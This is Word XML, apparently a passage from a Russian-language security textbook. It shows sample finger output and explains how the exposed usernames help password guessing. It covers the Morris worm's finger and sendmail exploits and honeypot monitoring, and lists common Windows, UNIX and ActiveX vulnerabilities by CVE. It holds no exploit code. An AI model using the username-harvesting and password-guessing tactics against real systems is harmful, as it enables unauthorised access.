    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="2291"/>
          <w:tab w:val="left" w:pos="2641"/>
          <w:tab w:val="left" w:pos="3097"/>
          <w:tab w:val="right" w:pos="3965"/>
          <w:tab w:val="left" w:pos="4134"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xenon</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>pts/7</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>22:34</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>May 12</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>16:00</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>(chrome.chiba)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="2291"/>
          <w:tab w:val="left" w:pos="2641"/>
          <w:tab w:val="left" w:pos="3010"/>
          <w:tab w:val="right" w:pos="3965"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>polly</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>pts/3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>4d</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>May 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>14:21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1392"/>
          <w:tab w:val="left" w:pos="2641"/>
          <w:tab w:val="right" w:pos="3965"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cracker</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>DarkHacker pts/6</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>2d May 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>11:58</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Из этой таблицы всем умеющим пользоваться службой </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">finger </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">становится доступна следующая информация: к сети подключено три пользователя, но два из них не обращались к ресурсам уже более двух суток, в то время как последний отошел от своего компьютера 22 минуты назад. Логины, которые демонстрирует </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">сервис </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">finger, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>можно использовать в процессе подбора комбинации логин-пароль. Это самый элементарный путь проникновения в систему, поскол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ку множество пользователей подбирают себе пароли на основе все тех же лог</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нов (например, добавляя в конце логина какие-либо цифры).</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Служба </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">finger </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">не только открывает важную информацию о сервере, на котором она работает, но является целью множества эксплойтов, одним из которых пользовался самый первый сетевой червь, созданный Робертом Моррисом </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Robert Morris) </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2 ноября 1988 года. По этой причине большинство современных дистрибутивов </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">UNIX </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">поставляются с отключенным сервисом </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>finger.</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Программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sendmail, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">изначально созданная Эриком Олмэном </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Eric Allman), </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">представляет собой еще один пример популярной цели для хакеров. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sendmail </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">была разработана для осуществления пересылки электронной почты через интернет. Из-за большого числа операционных систем и компьютерных конфигураций </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sendmail </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">постепенно стала чудовищно сложной программой с длительной и поучительной историей обнаружения критических уязвимостей. Все тот же червь </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Morris </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">использовал для своего распространения эксплойт уязвимости в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sendmail </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">наравне с уязвимостью в службе </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>finger.</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В мире </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">UNIX </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">есть множество других часто используемых уязвимостей в программных пакетах вроде </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH, Apache, WU-FTPD, BIND, IMAP/POP3 </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и в различных частях ядра ОС.</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Все описанные выше инциденты позволяют сделать вывод, что сетевой червь или иная автоматизированная хакерская утилита, распространяющаяся через уязвимости в обычных подключенных к интернету компьютерах под управлением </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>общее число которых, вероятно, превышает несколько сотен миллионов, представляет чрезвычайно серьезную угрозу стабильности и работоспособности всего интернета</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Для отслеживания наиболее часто применяемых эксплойтов и используемых уязвимостей можно использовать географически распределенную сеть ловушек — компьютеров с особым программным обеспечением для перехвата и анализа сетевого трафика. Собрав данные с относительно большого числа подобных ловушек и обработав их по типу, источнику и пункту назначения сетевого пакета можно получить статистику наиболее часто встречающихся атак, самых безопасных (или небезопасных) географических регионах, которая позволит отслеживать изменения в предпочитаемых хакерами эксплойтах с теч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нием времени.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Основные уязвимости в ОС </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Windows:</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Web Servers &amp; Services Workstation Service Windows Remote Access Services Microsoft SQL Server (MSSQL)</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Windows Authentication Web Browsers File-Sharing Applications LSAS Exposures Mail Client Instant Messaging</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Основные уязвимости в ОС </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>UNIX:</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BIND Domain Name System Web Server Authentication Version Control Systems Mail Transport Service</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lastRenderedPageBreak/>
        <w:t>Simple Network Management Protocol (SNMP)</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Open Secure Sockets Layer (SSL)</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Misconfiguration of Enterprise Services NIS/NFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="59"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="59"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kernel</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Популярные уязвимости в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ActiveX </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>компонентах для Интернет браузера:</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WebViewFolderIcon (MS06-57)</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Apple QuickTime (CVE-2004-0431)</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WinZip FileView (MS06-067)</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Microsoft XMLHttp (MS06-071)</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ADODB.Connection (CVE-2006-5559)</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ADODB.Recordset (MS07-009)</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ADODB.Stream MSXML2.ServerXMLHTTP WScript.Shell IESlice (MS05-002)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="59"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="59"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ascii</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="59"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="59"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="59"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-2006-3227)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="59"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Методы скрытия вредоносного кода </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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8"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
